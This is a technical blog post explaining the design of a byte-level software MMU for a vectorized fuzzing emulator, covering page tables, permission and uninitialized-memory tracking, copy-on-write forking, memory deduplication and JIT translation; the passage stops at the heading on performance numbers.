<p>The first generation of my MMU was a simple modification to QEMU to allow for quick tracking of which memory was modified. In this case my target was a system level target so I was not using <code class="language-plaintext highlighter-rouge">qemu-user</code>, but rather <code class="language-plaintext highlighter-rouge">qemu-system</code>. I ripped out the core physical memory manager in QEMU and replaced it with my own that effectively mimicked the x86 page table model. I was most comfortable with the x86 page table model and since it was implemented in hardware I assumed it was probably well engineered. The only interest I had in this first MMU was to quickly gather which memory was modified so I could restore only the dirtied memory to save time during reset time. This had a huge improvement <a href="https://github.com/gamozolabs/falkervisor_grilled_cheese">for my hypervisor</a> so it was natural for me to just copy it over the QEMU so I could get the same benefits.</p>
<h4 id="second-generation">Second generation</h4>
<p>While still continuing on QEMU modifications I started to get a bit more creative. Since I was handling all the physical memory accesses directly in software, there was no reason I couldn’t use page tables of my own shape. I switched to using a page table that supported 32-bit addresses (my target was MIPS32 and ARM32) using 8-bits per table. This gave me 256-byte pages rather than traditional 4-KiB x86 pages and allowed me to reset more specific dirty pages and reduces the overall work for resets.</p>
<h4 id="third-generation">Third generation</h4>
<p>At this point I was tinkering around with different page table shapes to find which worked fast. But then I realized I could set the final translation page size to 1-byte and I would be able to apply permissions to any arbitrary location in memory. Since memory of the target system was still using 4-KiB pages I wasn’t able to apply byte-level permissions in the snapshotted target, however I was able to apply byte-level permissions to memory returned from hooked functions like <code class="language-plaintext highlighter-rouge">malloc()</code>. By setting permissions directly to the size actually requested by <code class="language-plaintext highlighter-rouge">malloc()</code> we could find 1-byte out-of-bounds memory accesses. This ended up finding a bug which was only slightly out-of-bounds (1 or 2 bytes), and since this was now a crash it was prioritized for use in future fuzz cases. This prioritization (or feedback) eventually ended up with the out-of-bounds growing to hundreds of bytes, which would crash even on an actual system.</p>
<h4 id="fourth-generation">Fourth generation</h4>
<p>I ended up designing my own emulator for MIPS32, performance wasn’t really the focus. I basically copied the model I used for the 3rd generation. I also kept the 1-byte paging as by this point it was a potent tool in my toolbag. However once I switched this emulator to use JIT I started to run into some performance issues. This caused me to drop the emulated page tables and byte level permissions and switch to a direct-memory-access model.</p>
<p>At this time I was doing most of my development for my emulator to run directly on my OS. Since my OS didn’t follow any traditional models this allowed me to create a user-land application with almost any address space as I wanted. I directly used the MMU of the hardware to support running my JIT in the context of a different address space. In this model the JITted code just directly accessed memory, which except for a few pages in the address space, was just the exact same as the actual guest’s address space.</p>
<p>For example if the guest wanted to access address <code class="language-plaintext highlighter-rouge">0x13370000</code>, it would just directly dereference the memory at <code class="language-plaintext highlighter-rouge">0x1337000</code>. No translation, not base applied, simple.</p>
<p>You can see this code in the <code class="language-plaintext highlighter-rouge">srcs/emu</code> folder in <a href="https://github.com/gamozolabs/falkervisor_grilled_cheese">falkervisor</a>.</p>
<p>I used this model for a long time as it was ideal for performance and didn’t really restrict the guest from any unique address space shapes. I used this memory model in my vectorized emulator for quite a while as well, but with a scale applied to the address as I interleaved multiple VM’s memory.</p>
<h4 id="fifth-generation">Fifth generation</h4>
<p>The vectorized emulator was initially designed for hard targets, and the primary goal was to extract as much information as possible from the code under test. When trying to improve it’s ability to find bugs I remembered that in the past I had done a byte-level MMU with much success. I had a silly idea of how I could handle these permission checks. Since in the JIT I control what code is run when doing a read or write, I could simply JIT code to do the permission checks. I decided that I would simply have 1 extra byte for every byte of the target. This byte would be all of the permissions for the corresponding byte in the memory map (read, write, and/or execute).</p>
<p>Since now I needed to have 2 memory regions for this, I started to switch from using my OS and the stripped down user-land process address space to using 2 linear mappings in my process. Since this was more portable I decided to start developing my vectorized emulator to run on just Windows/Linux. On a guest memory access I would simply bounds check the address to make sure it’s in a certain range, and then add the address to the base/permission allocations. This is similar to what <code class="language-plaintext highlighter-rouge">qemu-user</code> does but with a permission region as well. The JIT would check these permissions by reading the permissions memory first and checking for the corresponding bits.</p>
<h4 id="sixth-generation">Sixth generation</h4>
<p>The performance of the fifth generation MMU was pretty good for JIT, but was terrible for process start times. I would end up reserving multiple terabytes of memory for the guest address spaces. This made it take a long time to start up processes and even tear them down as they blocked until the OS cleaned up their resources. Further commit memory usage was quite high as I would commit entire 4-KiB guest pages, which were actually 128-KiB (16 vectorized VMs * 2 regions (permission and memory region) * 4 KiB). To mitigate these issues we ended up at the current design….</p>
<hr />
<h1 id="page-tables">Page Tables</h1>
<p>Before we hop into soft MMU design it’s important to understand what I mean when I say page tables. Page tables take some bit-slice of the address to be translated and use it as the index for an element in a first level table. This table points to another table which is then indexed by a different bit-slice of the same address. This may continue for however many levels are used in the page table. In my case the shape of this page table is dynamically configurable and we’ll go into that a bit more.</p>
<p><img src="/assets/intel_4kib_4level_paging.png" alt="Page table" /></p>
<p>In the case of 64-bit x86 there is a 4 level lookup, where 9 bits are used for each level. This means each page table contains 512 entries. Each entry is a pointer to the next page table, or the actual page if it’s the final level. Finally the bottom 12 bits of the address are used as the offset into the page to find the specific byte. This paging model would show up as <code class="language-plaintext highlighter-rouge">[9, 9, 9, 9, 12]</code> according to my dynamic paging model. This syntax will be explained later.</p>
<p>For x86 there are alignment requirements for the page table entries (must be 4-KiB aligned). Further physical addresses are only 52-bits. This leaves 12 bits at the bottom of the page table entry and 12 bits at the top for use as metadata. x86 uses this to store information such as: If the page is present, writable, privileged, caching behavior, whether it’s been accessed/modified, whether it’s executable, etc. This metadata has no cost in hardware but in software, traversing this has a cost as the metadata must be masked off for the pointer to be extracted. This might not seem to matter but when doing billions of translations a second, the extra masking operations add up.</p>
<p>Here’s the actual metadata of a 4 KiB page on 64-bit Intel:</p>
<p><img src="/assets/intel_4kib_metadata.png" alt="Page table metadata" /></p>
<hr />
<h1 id="the-overall-design">The overall design</h1>
<p><em>My vectorized emulator is being rewritten to be 64-bit rather than 32-bit. We’re now running 2048 VMs rather than 4096 VMs as we can only run 8 VMs per thread. All of this design is for 64-bits.</em></p>
<p>When designing the new MMU there were a few critical features it needed:</p>
<ul>
<li>Byte level permissions</li>
<li>Fast snapshot/restore times</li>
<li>A data structure that could be quickly traversed in JIT</li>
<li>Quick process start times</li>
<li>The ability to handle full 64-bit address spaces</li>
<li>Low memory usage (we need to run 2048 VMs)</li>
<li>Quick methods for injecting fuzz inputs (we need a way to get fuzz inputs in to the memory millions of times per second)</li>
<li>Must be easily tested for correctness</li>
<li>Ability to track uninitialized memory at a byte-level</li>
<li>Read-only memory shared between all cores</li>
</ul>
<h1 id="applying-byte-level-permissions">Applying byte-level permissions</h1>
<p>So we have this byte-level permission goal, but how do we actually get byte-level information to apply anyways?</p>
<p>Since most fuzzing is done from an already-existing snapshot from a real system with 4 KiB paging and permissions, we cannot just magically get byte-level permissions. We have to find locations that can be restricted to specific byte-level sizes.</p>
<p>The easiest way to do this is just ignore everything in the snapshot. We can apply byte-level permissions to only new memory allocations that we emulate by adding breakpoints to the target’s allocate routines. Further by hooking frees we can delete the mappings and catch use-after-frees.</p>
<p>We can get a bit more fancy if we’re enlightened as to the internals of the allocator of the target under test. Upon loading of the snapshot we could walk the heap metadata and trim down allocations to the byte-level sizes they originally requested. If the heap does not provide the requested size then this is not possible. Further allocations which fit perfectly in a bin might not have any room after them to place even a single guard byte.</p>
<p>To remedy these problems there a few solutions. We can use page heap in the application we’re taking a snapshot in, which will always ensure we have a page after the allocation we can play with for guard bytes. Further page heap has the requested size in the metadata so we can get perfect byte-level applied.</p>
<p>If page heap is not available for the allocator you’re gonna have to get really creative and probably replace the allocator. You could also hack it up and use a debugger to always add a few bytes to each allocation (ensuring room for guard bytes), while logging the requested sizes. This information could then be used to create a perfect byte heap.</p>
<h4 id="getting-even-fancier">Getting even fancier</h4>
<p>When going at a really hard target you could also start to add guard bytes between padding fields of structures (using symbol information or compiler plugins) and globals. The more you restrict, the more you can detect.</p>
<hr />
<h1 id="design-features">Design features</h1>
<h4 id="basics-of-the-vectorized-model">Basics of the vectorized model</h4>
<p>This was covered in the intro, but since it’s directly applicable to the MMU it’s important to mention here.</p>
<p>Memory between the different lanes on a given core is interleaved at the 8-byte level (4-byte level for 32-bit VMs). This means that when accessing the same address on all VMs we’re able to dispatch a single read at one address to load all 8 VM’s memory. This has the downside of unaligned memory accesses being much more expensive as they now require multiple loads. However the common case most memory is accessed at the same address, and memory does not straddle a 8-byte boundary. It’s worth it.</p>
<p>For reference the cost of a single load instruction <code class="language-plaintext highlighter-rouge">vmovdqa64</code> is about 4-5 cycles, where a <code class="language-plaintext highlighter-rouge">vpgatherqq</code> load is 20-30 cycles. Unless memory is so frequently accessed from different addresses and straddling 8-byte boundaries it is always worth interleaving.</p>
<p>VM interleaving looks as follows:</p>
<p><em>chart simplified to show 4 lanes instead of 8</em></p>
<table>
<thead>
<tr>
<th>Guest Address</th>
<th>Host Address</th>
<th>Qword 1</th>
<th>Qword 2</th>
<th>Qword 3</th>
<th>…</th>
<th>Qword 8</th>
</tr>
</thead>
<tbody>
<tr>
<td>0x0000</td>
<td>0x0000</td>
<td>1</td>
<td>2</td>
<td>3</td>
<td>…</td>
<td>33</td>
</tr>
<tr>
<td>0x0008</td>
<td>0x0040</td>
<td>32</td>
<td>74</td>
<td>55</td>
<td>…</td>
<td>45</td>
</tr>
<tr>
<td>0x0010</td>
<td>0x0080</td>
<td>24</td>
<td>24</td>
<td>24</td>
<td>…</td>
<td>24</td>
</tr>
</tbody>
</table>
<p>This interleaves all the memory between the VMs at an 8-byte level. If a memory access straddles an 8-byte value things get quite slow but this is a rare case and we’re not too concerned about it.</p>
<h4 id="how-do-we-build-a-testable-model">How do we build a testable model?</h4>
<p>To start off development it was important to build a good foundation that could be easily tested. To do this I tried to write everything as naive as possible to decrease the chance of mistakes. Since performance is only really required in the JIT, the Rust-level MMU routines were written cleanly and used as the reference implementation to test against. If high-performance methods were needing for modifying memory or permissions they would be supplemental and verified against the naive implementation. This set us up to be in good shape for testing!</p>
<h4 id="64-bit-address-spaces">64-bit address spaces</h4>
<p>To support full 64-bit address spaces we are forced to use some data structure to handle memory as nothing in x86 can directly use a 64-bit address space. Page tables continue to be the design we go with here.</p>
<p>Since we were writing the code in a naive way, it was easy to make most of the MMU model configurable by constants in the code. For example the shape of the page tables is defined by a constant called <code class="language-plaintext highlighter-rouge">PAGE_TABLE_LAYOUT</code>. This is used in reality in the form: <code class="language-plaintext highlighter-rouge">const PAGE_TABLE_LAYOUT: [u32; PAGE_TABLE_DEPTH] = [16, 16, 16, 13, 3];</code>.</p>
<p>This array defines the number of bits used for translating each level in the page table, and <code class="language-plaintext highlighter-rouge">PAGE_TABLE_DEPTH</code> sets the number of levels in the page table. In the example above this shows that we use the top 16-bits for the first level as the index, the next 16-bits for the next level, the next 16-bits again for another level, a 13-bit level, and finally a 3-bit page size. As long as this <code class="language-plaintext highlighter-rouge">PAGE_TABLE_LAYOUT</code> adds up to 64-bits, contains at least 2 entries (1 level page table), and at least has a final translation size of 8-byte (like in the example), the MMU and JITs will be updated. This allows profiling to be done of a specific target and modify the page table to whatever shape works best. This also allows for changes between performance and memory usage if needed.</p>
<h4 id="fast-restores">Fast restores</h4>
<p>When writing my hypervisor I walked the SVM page tables looking for dirty pages to restore. On x86 there are only dirty bits on the last level of the page tables. For all other levels there’s only an ‘accessed’ bit (updated when the translation is used for any access). I would walk every entry in each page table, if it was accessed I would recurse to the next level, otherwise skip it, at the final level I would check for the dirty bit and only restore the memory if it was marked as dirty. This meant I walked the page tables for all the memory that was ever used, but only restored dirty memory. Walking the page tables caused quite a bit of cache pollution which would cause significant damage to the performance of other cores.</p>
<p>To speed this up I could potentially place a dirty bit on every page table level, and then I would only ever start walking a path that contains a dirty page. I used this model at some point historically, however I’ve got a better model now.</p>
<p>Instead of walking page tables I just now append the address to a vector when I first set a dirty bit. This means when resetting a VM I only read a linear array of addresses to restore. I still need a dirty bit somewhere so I make sure I don’t add duplicates to this list. Since I no longer need to walk page tables I only put dirty bits on the final level. <em>This was a decision driven by actual data on real targets, it’s much faster.</em></p>
<p>If during execution I run out of entries in this dirty list I exit out of the VM with a special VM-exit status indicating this list is full. This then allows me to append this list at Rust-level to a dynamically sized allocation. Since the size of this list is tunable it would grow as needed and converge to never hitting VM-exits due to dirty list exhaustion. Further this dirty list is typically pretty tiny so the cost isn’t that high.</p>
<p>Interestingly Intel introduced (not sure if it’s in silicon yet) a way of getting a similar thing for VMs (this is called <a href="https://www.intel.com/content/dam/www/public/us/en/documents/white-papers/page-modification-logging-vmm-white-paper.pdf">Page Modification Logging</a>). The processor itself will give you a linear list of dirty pages. We do not use this as it is not supported in the processor we are using.</p>
<h4 id="permissions">Permissions</h4>
<p>On classic x86 (and really any other architecture) permissions bits are added at each level of the page table. This allows for the processor to abort a page table walk early, and also allows OSes to change permissions for large regions of memory by updating a single entry. However since we’re running multiple VM’s at the same time it’s possible each VM has different memory mapped in. To handle this we need a permission byte for each byte for each VM.</p>
<p>Since we can’t handle the permissions checks during the page table walk (technically could be possible if the permissions are a superset of all the VM’s permissions), we get to have a metadata-less page table walk until the final level where we store the dirty bit. This means that during a page table walk we do not need to mask off bits, we can just directly keep dereferencing.</p>
<p>There are currently 4 permission bits. A read bit, a write bit, an execute bit, and a RaW bit (see next section). All of these bits are completely independent. This allows for arbitrary permission sets like write-only memory, and execute-only memory.</p>
<p>In some older versions of my MMU I had a page table for both permissions and data. This is pretty pointless as they always have the same shape. This caused me to perform 2 page table walks for every single memory access.</p>
<p>In the new model I interleave the memory and permissions for the VMs such that one walk will give me access to the permissions and memory contents. Further in memory the permissions come first followed by the contents. Since permissions are checked first this allows for the memory to be accessed linearally and potentially get a speedup by the hardware prefetchers.</p>
<p>When permissions and contents are laid out in a pretty format it looks something like:</p>
<p><em>Simplified to 4 lanes instead of 8</em>
<img src="/assets/mmu_layout.png" alt="MMU layout" /></p>
<p>We can see every byte of contents has a byte of permissions and the permissions come first in memory. This image displays directly how the memory looks if you were to dump the MMU region for a page as qwords.</p>
<h4 id="uninitialized-memory-tracking">Uninitialized memory tracking</h4>
<p>To track uninitialized memory I introduce a new permission bit called the RaW (read-after-write) bit. This bit indicates that memory is only readable after it has been written to. In allocator hooks or by manual application to regions of memory this bit can be set and the read bit cleared.</p>
<p>On all writes to memory the RaW it is unconditionally copied to the read bit. It’s done unconditionally because it’s cheaper to shift-and-or every time than have a conditional operation.</p>
<p>Simple as that, now memory marked as RaW and non-readable will become readable on writes! Just like all other permission bits this is byte-level. <code class="language-plaintext highlighter-rouge">malloc()</code>ing 8 bytes, writing one byte to it, and then reading all 8 bytes will cause an uninitialized memory fault!</p>
<hr />
<h1 id="gage-fuzzing">Gage fuzzing</h1>
<p>Okay there’s probably a name for this already but I call it ‘gage’ fuzzing (from gage blocks, precisely ground measurement references). It’s a precise fuzzing technique I use where I start without a snapshot at all, but rather just the code. In this case I load up a PE/ELF, mark all writable regions as read-after-write, and point PC to a function I want to fuzz. Further I set up the parameters to the function, and if one of the parameters happens to be a pointer to memory I don’t understand yet, I can mark the contents of the pointer to read-after-write as well.</p>
<p>As globals and parameters are used I get faults telling me that uninitialized memory was used. This allows me to reverse out the specific fields that the function operates on as needed. Since the memory is read-after-write, if the function writes to the memory prior to reading it then I don’t have to worry what that memory is at all.</p>
<p>This process is extremely time consuming, but it is basically dynamic-driven reversing/source auditing. You lazily reverse the things you need to, which forces you to understand small pieces at a time. While you build understanding of the things the function uses you ultimately learn the code and learn potential places to audit more or add things like guard bytes.</p>
<p>This is my go-to methodology for fuzzing extremely hard targets where every advantage is required. Further this works for fuzzing codebases which are not runnable, or you only have partial snapshots of. Works great for kernel fuzzing or firmware fuzzing when you don’t have a great way of getting a snapshot!</p>
<p><em>I mention ‘function’ in this case but there’s nothing restricting you from fuzzing a whole application with this model. Things without global state can be trivially fuzzed in their entirety with a model like this. Further, I’ve done things like call the init routine for a class/program and then jump to the parser when init returns to skip some of the manual processing.</em></p>
<hr />
<h1 id="theory-into-practice">Theory into practice</h1>
<p>So we know the features and what we want in theory, however in practice things get a lot harder. We have to abide by the design decisions while maintaining some semblance of performance and support for edge cases in the JIT.</p>
<p>We’ve got a few things that could make this hard to JIT. First of all performance is going to be an issue, we need to find a way to minimize the frequency of page table walks as well as decrease the cost of a walk itself. Further we have to be able to support edge cases where VMs are disabled, pages are not present, and VMs are accessing different memory at the same time.</p>
<h4 id="64-bit-saves-the-day">64-bit saves the day</h4>
<p>Since now the vectorized emulator is 64-bit rather than 32-bit, we can hold pointers in lanes of the vector. This allows us to use the scatter and gather instructions during page table walks. However, while magical and fast at what they do, these scatter/gather instructions are much slower than their standard load/store counterparts.</p>
<p>Thus in the edge case where VMs are accessing different memory we are able to vectorize the page table walks. This means we’re able to perform 8 completely different page table walks at the same time. However in most cases VMs are accessing the same memory and thus it’s cheaper for us to check if we’re accessing different memory first, and either perform the same walk for all VMs (same address), or perform a vectorized page table walk with scatter/gather instructions.</p>
<p>In the case of differing addresses this vectorized page table walk is much faster than 8 separate walks and provides a huge advantage over the previous 32-bit model.</p>
<h4 id="handling-non-present-pages">Handling non-present pages</h4>
<p>Typically in most architectures there is a present bit used in the page tables to indicate that an entry is present. This really just allows them to map in the physical address NULL in page tables. Since we’re running as a user application using virtual addresses we cheat and just use the pointers for page table entries.</p>
<p>If an entry is NULL (64-bit zero), then we stop the walk and immediately deliver a fault. This means to perform the page table walk until the final page we simply read a page table entry, check if it’s zero, and go to the next level. No need to mask off permission/present bits. For the final level we have a dirty bit, and a few more bits which we must mask off. We’ll discuss these other bits later.</p>
<h4 id="what-is-a-page-fault">What is a page fault?</h4>
<p>In the case of a non-present page in the page table, or a permission bit not being present for the corresponding operation we need a way to deliver a page fault. Since the VM is just effectively one big function, we’re able to set a register with a VM exit code and return out. This is an implementation detail but it’s important that a <code class="language-plaintext highlighter-rouge">ret</code> allows us to exit from the emulator at any time.</p>
<p>Further since it’s possible VMs could have different permissions or page tables, we report a <code class="language-plaintext highlighter-rouge">caused_vmexit</code> mask, which indicates which lanes of the vector were responsible for causing the exception. This allows us to record the results, disable the faulting VMs, and re-enter the emulator to continue running the remaining VMs.</p>
<h1 id="memory-costs">Memory costs</h1>
<p>Since we’re running vectorized code we interleave 8 VMs at the same time. Further there is a permission byte for every byte. We also have a minimum page size of 8-bytes. Meaning the smallest possible actual commit size for a page on a single hardware thread is 128 bytes. PAGE_SIZE (8 bytes) * NUM_VMS (8) * 2 (permission byte and content byte). This is important as a single 4096-byte x86 page is actually 64 KiB. Which is… quite large. The larger the page size the better the performance, but the higher memory usage.</p>
<h1 id="saving-time-and-memory">Saving time and memory</h1>
<p>We’ve discussed that the previous MMU model used was quite slow for startup and shutdown times. This mean it could take 30+ seconds to start the emulator, and another 30 seconds to exit the process. Even with a hard ctrl+c.</p>
<p>To remedy this, everything we do is <em>lazy</em>. When I say lazy I mean that we try to only ever create mappings, copies, and perform updates when absolutely required.</p>
<h4 id="vms-have-no-memory-to-start-off">VMs have no memory to start off</h4>
<p>When a VM launches it has zero memory in it’s MMU. This means creating a VM costs almost nothing (a few milliseconds). It creates an empty page table and that’s it.</p>
<h4 id="so-where-does-memory-come-from">So where does memory come from?</h4>
<p>Since a VM starts off with no memory at all, it can’t possibly have the contents of the snapshot we are executing from. This is because only the metadata of the snapshot was processed. When the VM attempts to touch the first memory it uses (likely the memory containing the first instruction), it will raise an exception.</p>
<p>We’ve designed the MMU such that there is an ability to install an exception handler. This means that on an exception we can check if the input snapshot contained the memory we faulted on. If it did then we can read the memory from the snapshot and map it in. Then the VM can be resumed.</p>
<p>This has the awesome effect of only memory that is ever touched is brought in from disk. If you have a 100 terabyte memory snapshot but the fuzz case only touches 1 MiB of memory, you only ever actually read 1 MiB from disk (plus the metadata of the snapshot, eg. PE/ELF headers). This memory is pulled in based on the page granularity in use. Since this is configurable you can tweak it to your hearts desire.</p>
<h1 id="sharing-memory--forking">Sharing memory / forking</h1>
<p>Memory which is only ever read has no reason to be copied for every VM. Thus we need a mechanism for sharing read-only memory between VMs. Further memory is shared between all cores running in the same “IL session”, or group of VMs fuzzing the same code and target.</p>
<p>We accomplish this by using a forking model. A ‘master’ MMU is created and an exception handler is installed to handle faults (to lazily pull in memory contents). The master MMU is the template for all future VMs and is the state of memory upon a reset.</p>
<p>When a core comes up, a fork from this ‘master’ MMU is created. Once again this is lazy. The child has no memory mapped in and will fault in pages from the master when needed.</p>
<p>When a page is accessed for reading only by a child VM the page in the child is directly mapped to the master’s copy. However since this memory could theoretically have write-permissions at the byte level, we protect this memory by setting an <code class="language-plaintext highlighter-rouge">aliased</code> bit on the last level page table, next to the <code class="language-plaintext highlighter-rouge">dirty</code> bit. This gives us a mechanism to prevent a master’s memory from ever getting updated even if it’s writable.</p>
<p>To allow for writes to the VM we add another bit to the last level page tables, a <code class="language-plaintext highlighter-rouge">cow</code>, or copy-on-write, bit. This is always accompanied with the <code class="language-plaintext highlighter-rouge">aliased</code> bit, and instead of delivering a fault on a write-to-aliased-memory access, we create a copy of the master’s page and allow writes to that.</p>
<h1 id="an-example-in-aliasedcowed-memory-access">An example in aliased/CoWed memory access</h1>
<p>This leads us to a pretty sophisticated potential model of fault patterns. Let’s walk through a common case example.</p>
<ul>
<li>An empty master MMU is created</li>
<li>An exception handler is added to the master MMU that faults in pages from the disk on-demand</li>
<li>A child is forked from the master</li>
<li>A <strong>read</strong> occurs to a page in the child</li>
<li>This causes an exception in the child as it has no memory</li>
<li>The exception handler recognizes there’s a master for this child and goes to access the master’s memory for this page</li>
<li>The master has no memory for this page and causes an exception</li>
<li>The master’s exception handler handles loading the page from disk, creating an entry</li>
<li>The master returns out with exception handled</li>
<li>The child directly links in the master’s page as aliased</li>
<li>Child returns with no exception</li>
<li>Child then dispatches a <strong>write</strong> to the same memory</li>
<li>The page is marked as aliased and thus cannot be written to</li>
<li>A copy of the master’s page is made</li>
<li>The permissions are checked in the page for write-access for all bytes being written to</li>
<li>The write occurs in the child-owned page</li>
<li>Success</li>
</ul>
<p>While this is quite slow for the initial access, the child maintains it’s CoWed memory upon reset. This means that while the first few fuzz cases may be slow as memory is faulted in and copied, this cost eventually completely disappears as memory reaches a steady-state.</p>
<p>The overall result of this model is that memory only is ever read from disk if ever used, it then is only ever copied if it needs to be mutated. Memory which is only ever read is shared between all cores and greatly reduces cache pollution.</p>
<p>In theory a copy of all pages should be made for every NUMA node on the system to decrease latency in the case of a cache miss. This increases memory usage but increases performance.</p>
<p>All of this is done at page granularity which is configurable. Now you can see how big of an impact 8-byte pages can have as memory which may be writable (like a stack) but never is written to for a specific 8-byte region can be shared without extra memory cost.</p>
<p>This allows running 2048 4 GiB VMs with typically less than 200 MiB of memory usage as most fuzz cases touch a tiny amount of memory. Of course this will vary by target.</p>
<h1 id="deduplicated-memory">Deduplicated memory</h1>
<p>Ha! You thought we were all done and ready to talk about performance? Not quite yet, we’ve got another trick up our sleeves!</p>
<p>Since we’re already sharing memory and have support for aliased memory, we can take it one step further. When we add memory to the VM we can deduplicate it.</p>
<p>This might sound really complex, but the implementation is so simple that there’s almost no reason to not do it. Rather than directly creating memory in the the master, we can instead maintain a <code class="language-plaintext highlighter-rouge">HashSet</code> of pages and create aliased mappings to the entries in this set. When memory is added to a VM it is added to the deduplicated <code class="language-plaintext highlighter-rouge">HashSet</code>, which will create a new entry if it does not exist, or do nothing if it already exists. The page tables then directly reference the memory in this <code class="language-plaintext highlighter-rouge">HashSet</code> with the <code class="language-plaintext highlighter-rouge">aliased</code> bit set. Since pages contain the permissions this automatically handles creating different copies of the same memory with different permissions</p>
<p>Ta-da! We now will only create one read-only copy of each unique page. Say you have 1 MiB of read-writable zeros (would be 16 MiB when interleaved and with permissions), and are using 8-byte pages, you end up only ever creating one 8-byte page (128-byte actual backing) for all of this memory! As with other <code class="language-plaintext highlighter-rouge">aliased</code> memory, it can be <code class="language-plaintext highlighter-rouge">cow</code> memory and cloned if modified.</p>
<p>The gain from this is minimal in practice, but the code complexity increase given we already handle <code class="language-plaintext highlighter-rouge">cow</code> and <code class="language-plaintext highlighter-rouge">aliased</code> memory is so little that there’s really no reason to <em>not</em> do it. Since the Xeon Phi has no L3 cache, anything I can do to reduce cache pollution helps.</p>
<p>For example with a child with memory contents “AAAA00:D!!” where the “:D” was written in at offset 6.</p>
<p><img src="/assets/cow_and_dedup.png" alt="cow_and_dedup" /></p>
<hr />
<h1 id="performance">Performance</h1>
<p>Alright so we’ve talked about everything we implement in the MMU, but we haven’t talked at all about the JIT or performance.</p>
<p>There are two important aspects to performance:</p>
<ul>
<li>The JIT</li>
<li>Injecting fuzz cases / allocating memory</li>
</ul>
<p>The JIT performance being important should be obvious. Memory accesses are the most expensive things we can do in our emulator and are responsible from bringing our best case 2 trillion instructions/second benchmark to about 40-120 billion instructions/second in an actual codebase (old numbers, old MMU, 32-bit model). The faster we can make memory accesses, the closer we can get to this best-case performance number. This means we have a potential 50x speedup if we were to make memory accesses cost nothing.</p>
<p>Next we have the maybe-not-so-obvious performance-critical aspect. Getting fuzz cases into the VMs and handling dynamic allocations in the VMs. While this is pretty much never a problem in traditional fuzzers, on a small target I may be running between 2-5 million fuzz cases per second. Meaning I need to somehow perform 2-5 million changes to the MMU per second (typically 1024-or-so byte inputs).</p>
<p>Further the VM may dynamically allocate memory via <code class="language-plaintext highlighter-rouge">malloc()</code> which we hook to get byte-level allocation support and to track uninitialized memory. A VM might do this a few times a fuzz case, so this could result in potentially tens of millions of MMU modifications per second.</p>
<h1 id="the-jit--il">The JIT / IL</h1>
<p>We’re not going to go into insane details as I’ve open sourced the actual JIT used in the MMU described by this blog. However we can hit on some of the high-level JIT and IL concepts.</p>
<p>When we’re running under the JIT there may be arbitrary VMs running (the VM-0-must-always-be-running restriction described in the intro has been lifted), as well as potential differing addresses that they are accessing.</p>
<h4 id="differing-addresses">Differing addresses</h4>
<p>Since a vectorized page table walk is more expensive than a single page walk, we first always check whether or not the VMs that are active are accessing the same memory. If they’re accessing the same memory then we can extract the address from one of the VMs and perform a single scalar page walk. If they differ then we perform the more expensive vectorized walk (which is still a huge improvement from the 32-bit model of a different scalar walk for every differing address).</p>
<p>Since the only metadata we store in the page tables are the aliased, CoW, and dirty bits, the scalar page walk is safe to do for all VMs. If permissions differ between the VMs that’s fine as those bytes are stored in the page itself.</p>
<p>The part of the page walk that gets complex during a vectorized walk is updating the dirty bits. In a scalar walk it’s simple. If the dirty bit is not set and we’re performing a write, then we add to the dirty list and set the dirty bit. Otherwise we skip updating the dirty bit and dirty list. This prevents duplicate entries in the dirty list. Further we store the guest address and the translated address in the dirty list so we do not have to re-translate during a reset. If an exception occurs at any point during the walk, all VMs that are enabled are reported to have caused the exception.</p>
<p>We also perform the aliased memory check if and only if the dirty bit was not set. This aliased memory check is how we prevent writing to an aliased page. Since this check has a non-zero cost, and since dirty memory can never be aliased, we simply skip the check if the memory is already dirty. As it’s guaranteed to not be aliased if it’s dirty.</p>
<h4 id="vectorized-translation">Vectorized translation</h4>
<p>However in a vectorized walk it gets really tricky. First it’s possible that the different addresses fail translation at differing levels (during page table walks and during permission checks). Further they can have differing dirtiness which might require multiple entries to be added to the dirty list.</p>
<p>To handle translations failing at different points, we mask off VMs as they fail at various points. At the end of the translation we determine if <em>any</em> VM failed, and if it did we can report the failure correctly for all VM’s that failed at any point during the translation. This allows us to get a correct <code class="language-plaintext highlighter-rouge">caused_vmexit</code> mask from a single translation, rather than getting a partial report and getting more exceptions at a different translation stage on the next re-entry.</p>
<h4 id="vectorized-dirty-list-updating">Vectorized dirty list updating</h4>
<p>Further we have to handle dirty bits. I do this in a weird way right now and it might change over time. I’m trying to keep all possible JIT at parity with the interpreted implementation. The interpreted version is naive and simply performs the translations on all VMs in left-to-right order (see the JIT tests for this operation). This also maintains that no duplicates ever exist in the dirty lists.</p>
<p>To prevent duplicates in the dirty list we rely on the dirty bit in the page table, however when handling differing addresses we could potentially update the same address twice and create two dirty entries. The solution I made for this is to perform vectorized checks for the dirty bits, and if they’re already set we skip the expensive setting of the dirty bits. This is the fast path.</p>
<p>However in the slow path we store the addresses to the stack and individually update dirty bits and dirty entries for each lane. This prevents us from adding duplicates to the dirty list and keeps the JIT implementation at parity with the interpreter (thus allowing 1-to-1 checks for JIT correctness against the interpreter). Since we skip this slow path if the memory is already dirty, this probably won’t matter for performance. If it turns out to matter later on I might drop the no-duplicates-in-the-dirty-list restriction and vectorize updates to this list.</p>
<h1 id="il-mmu-routines">IL MMU routines</h1>
<p>I’m going to have a whole blog on my IL, but it’s a simple SSA IL.</p>
<p>Memory accesses themselves are pretty fast in my vectorized model, however the translations are slow. To mitigate this I split up translations and read/write operations in my IL. Since page walks, dirty updates, and permission checks are done in my translate IL instruction, I’m able to reuse translations from previous locations in the IL graph which use the same IL expression as the address.</p>
<p>For example, a 4-byte translate for writing of <code class="language-plaintext highlighter-rouge">rsp+0x50</code> occurs at the root block of a function. Now at future locations in the graph which read or write at the same location for 4-or-fewer bytes can reuse the translation. Since it’s an SSA the <code class="language-plaintext highlighter-rouge">rsp+0x50</code> value is tied to a certain version of <code class="language-plaintext highlighter-rouge">rsp</code>, thus changes to <code class="language-plaintext highlighter-rouge">rsp</code> do not cause the wrong translation to be used. This effectively deletes the page walks for stack locals and other memory which is not dynamically indexed in the function. It’s kind of like having a TLB in the IL itself.</p>
<p>Since the initial translate was responsible for the permission checks and updates of things like the RaW bits and dirty bits, we never have to run these checks again in this case. This turns memory operations into simple loads and stores.</p>
<p>Since stores are supersets of loads and larger sizes are supersets of smaller sizes, I can use translations from slightly different sizes and accesses.</p>
<p>Since it’s possible a VM exit occurs and memory/permissions are changed, I must have invalidate these translations on VM exits. More specifically I can invalidate them only on VM entries where a page table modification was made since the last VM exit. This makes the invalidate case rare enough to not matter.</p>
<h1 id="the-performance-numbers">The performance numbers</h1>
